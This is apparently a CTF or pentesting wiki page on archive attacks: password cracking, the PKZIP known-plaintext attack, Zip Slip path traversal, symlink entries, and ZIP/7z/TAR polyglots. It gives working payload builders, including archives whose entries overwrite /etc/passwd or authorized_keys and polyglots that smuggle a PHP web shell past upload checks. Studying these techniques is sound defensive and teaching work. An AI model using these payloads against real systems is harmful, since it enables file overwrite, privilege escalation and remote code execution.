Archives

Different kinds of file archives, like ZIP, RAR or TAR

File format

Sometimes a zip file can be corrupted, either intentionally or unintentionally. You can try to fix it using the -FF flag in zip:

$ zip -FF archive.zip --out fixed.zip

Sometimes binwalk can also help with finding files in the ZIP when unzip cannot.

When you suspect some kind of file trickery you should look at the file format, and find things that are weird about this ZIP file. Password Protection

Most types of archive files can set a password that encrypts the content until the correct password is given. There are a few tricks to brute-force or even bypass this password protection.

Brute-forcing

I spent a lot of time automating the cracking of password-protected archives in my default tool:

$ default crack archive.zip

It will automatically recognize the type of encryption used and start hashcat or john to crack it using a wordlist.

Doing it manually would require you to first get a hash using a tool like zip2john included in John the Ripper. Then you crack that hash with hashcat or john if you have the right hash mode.

Read filenames

An interesting little thing about most archive file formats is the fact that when they are encrypted, you can still read the filenames and structure, only the content is encrypted. This can already give a good idea of what kind of files the archive contains.

$ unzip -v archive.zip
Archive:  archive.zip
 Length   Method    Size  Cmpr    Date    Time   CRC-32   Name
--------  ------  ------- ---- ---------- ----- --------  ----
      15  Stored       15   0% 1970-01-01 00:00 21c0cb62  file.txt
--------          -------  ---                            -------
      15               15   0%                            1 file

As you can see, even the size and a CRC32 are present. This CRC is a checksum of the unencrypted file content, so if you can guess the content you can confirm it by taking the CRC. This allows for brute-forcing content of very small files as well. See this tool for an implementation of that:

ZIP Known Plaintext Attack

The PKZIP stream cipher is vulnerable to a Known Plaintext attack. This means that if we know some content of a file in the encrypted ZIP, we can use it to find the keys used to decrypt the rest.

With a faster brute-force attack afterward it is also possible to recover the original password for further use.

The bkcrack tool has a great implementation of this attack, see the tutorial here on how to use it:

Zip Slip Vulnerability

When creating your own archives that some target processes, you can include malicious filenames like ../../../../etc/passwd to overwrite/create local files in outside directories. This functionality can exist if an application has an import functionality or automatically extracts archives you upload.

While the most common format is ZIP, this vulnerability exists in many more archive types. Like .tar, .jar, .war, .cpio, .apk, .rar or .7z

Filenames in zip files can be folders because a ZIP file may contain folders, but the unexpected functionality is that they may even be ../ filenames, there is no limit. Most popular archive extract functions (from libraries) are safe from this by explicitly normalizing or forbidding these paths, but custom implementations could very well be vulnerable:

Java
Enumeration<ZipEntry> entries = zip.getEntries();
while (entries.hasMoreElements()) { 
    ZipEntry e = entries.nextElement(); 
    File f = new File(destinationDir, e.getName()); 
    InputStream input = zip.getInputStream(e); 6 IOUtils.copy(input, write(f)); 
}

The main pattern to look out for is:

  1. Looping through the elements

  2. Concatenating the target directory with the filename directly

To test for and exploit such a vulnerability, simply create a file entry with a custom name:

Python (ZIP)
import zipfile  # ZIP

with zipfile.ZipFile("payload.zip", "w") as zip:
    #          source            name
    zip.write("passwd", "../../../../etc/passwd")
Python (TAR)
import tarfile

with tarfile.TarFile("zipslip.tar", "w") as zip:
    zip.add("passwd", "../../../../etc/passwd")

The above example will create a ZIP file payload.zip, that when extracted by vulnerable, will try to overwrite /etc/passwd with the content you choose. This can be useful if root executes it for a Privilege Escalation scenario, but more commonly you'll want to get initial access by overwriting executable files like PHP shells, templates, dotfiles, or ~/.ssh/authorized_keys if SSH is enabled (see #writing-files for more details).

Aside from directory traversal in filenames like shown above, most formats can even include symbolic links that point to another path. When extracted, most libraries or commands will correctly recognize and create symlinks while extracting, but these special files can have weird side effects.

Processes afterward might read/write to this file but accidentally follow the symlink we created while doing so. This can result in arbitrary file read/write with multiple steps.

Tip: You can even include multiple file entries with the same name, allowing for even more complex attacks. See here for an example that writes a symlink, and then overwrites its contents from within the same TAR file

ZIP

When using zip to include a symlink you made, it will by default follow the symlink and include the content of the file it is pointing to. This may be useful for Linux Privilege Escalation when an application zips a symlink you make locally, but in a scenario where it only extracts the file, you should keep the symlink intact inside the ZIP file using the --symlinks option:

$ ln -s /etc/passwd link        # Create symlink locally
$ zip --symlinks payload.zip *  # Add to new archive
$ unzip -p link.zip link        # View to confirm symlink was added
/etc/passwd
$ 7z l -ba -slt link.zip        # type=l meaning symlink
...
Attributes = _ lrwxrwxrwx

TAR

By default, the tar command will allow storing and extracting symlinks:

$ ln -s /etc/passwd link  # Create symlink locally
$ tar -cvf payload.tar *  # Add to new archive
$ tar -tvf payload.tar    # View to confirm symlink was added
lrwxrwxrwx user/user     0 2023-00-00 00:00 link -> /etc/passwd

Polyglots

A "polyglot" is defined in English as a person who speaks multiple languages. When talking about file formats, this means a file that can be interpreted in multiple ways. These are useful for various reasons, mainly confusing parsers. A check might use one parser, but when using the file it will be parsed differently bypassing the check.

Archive files have a few interesting properties of flexibility that make it fairly straightforward to create one file that extracts in two different ways depending on the tool used to inspect/extract it.

To understand why tricks work and to come up with your own, look at the @corkami/pics repository which has simple but useful images for many file formats, including archives.

ZIP file extracting as 7z

When some code tries to validate a ZIP file before extracting it, there is a high chance you can confuse it somehow to have the check parse it differently than the extraction. One such example is using ZIP files combined with 7z. This is possible because a ZIP file is parsed from the end, while a .7z file is parsed from the start recognized by its magic bytes!

A useful tool that can help us with this is truepolyglot which has a zipany mode that can prefix a ZIP file with any content, and fix the offsets so it unzips without any errors. When we prefix a regular ZIP file with a 7z file, it will result in a special polyglot file that is a valid ZIP with some content, but 7z x extracts it with the .7z's content. This confusion may bypass some checks.

$ echo dummy > file.txt
$ zip file.zip file.txt  # Prepare ZIP (carrier)

$ echo '<?php system($_GET["cmd"]) ?>' > shell.php
$ 7z a shell.7z shell.php  # Prepare 7z (payload)

# # Combine into polyglot file
$ truepolyglot zipany --payload1file shell.7z --zipfile file.zip polyglot.zip

This created a polyglot.zip file which has the properties described above, confusing ZIP parsers thinking it is an innocent file, but has different contents when extracting using 7z x:

$ unzip -l polyglot.zip  # Shows only file.txt
  Length      Date    Time    Name
---------  ---------- -----   ----
        8  2023-10-18 20:52   file.txt
---------                     -------
        8                     1 file
$ 7z x polyglot.zip  # Only warnings, no errors

WARNINGS:
There are data after the end of archive

WARNING:
polyglot.zip
Can not open the file as [zip] archive
The file is open as [7z] archive
...

Everything is Ok

Warnings: 1
Size:       30
Compressed: 328
$ ls -l  # Writes shell.php instead
-rw-r--r-- 1 j0r1an j0r1an 10414 Oct 18 21:04 polyglot.zip
-rw-r--r-- 1 j0r1an j0r1an    15 Oct 18 21:00 shell.php

ZIP magic bytes as TAR

In the previous trick, we learned that ZIP gets parsed from the end of the file. This can bypass most parsers and doesn't require the first bytes to be the magic bytes in the file. In specific cases, however, this might not be enough, and you do need control over the start of the file to set the ZIP magic bytes for example. Then the trick above wouldn't work because the .7z format has its own.

To solve this, TAR can be used which does not require magic bytes at the start of the file like ZIP. When you try to create a raw .tar file using tar -cf, you may notice that it immediately starts with the filename you added:

$ touch ABCDEFGH
$ tar -cf test.tar ABCDEFGH
$ hd test.tar 
00000000  41 42 43 44 45 46 47 48  00 00 00 00 00 00 00 00  |ABCDEFGH........|
00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
...

This can be abused to overwrite this filename with the ZIP magic bytes, which will happily be parsed as a filename. By overwriting these bytes, we bypass the magic bytes at the start of the file, and during extraction, the rest of the files in the TAR will be extracted.

$ echo 'dummy' > file.txt
$ zip file.zip file.txt  # Prepare ZIP (carrier)

$ echo '<?php system($_GET["cmd"]) ?>' > shell.php
$ touch $'PK\x03\x04'
$ tar -cf shell.tar $'PK\x03\x04' shell.php  # Prepare TAR (payload)

# # Combine into polyglot file
$ truepolyglot zipany --payload1file shell.tar --zipfile file.zip polyglot.zip

The shell.tar file will have the correct magic bytes already, which are kept after the truepolyglot in the final polyglot.zip file. This will have ZIP magic bytes, be a valid parsable ZIP file, and at the same time be recognized as TAR by 7z. See the following demo:

$ head -c 4 polyglot.zip | hd  # Correct magic bytes
00000000  50 4b 03 04           |PK..|
00000004
$ unzip -l polyglot.zip  # Shows only file.txt
  Length      Date    Time    Name
---------  ---------- -----   ----
        8  2023-10-18 20:52   file.txt
---------                     -------
        8                     1 file
$ 7z x polyglot.zip  # Only warnings, no errors

WARNINGS:
There are data after the end of archive

WARNING:
polyglot.zip
Can not open the file as [zip] archive
The file is open as [tar] archive
...
Everything is Ok

Warnings: 1
Size:       15
Compressed: 10414
$ ls -l  # Writes shell.php instead
-rw-r--r-- 1 j0r1an j0r1an 10414 Oct 18 21:04 polyglot.zip
-rw-r--r-- 1 j0r1an j0r1an    15 Oct 18 21:00 shell.php

Last updated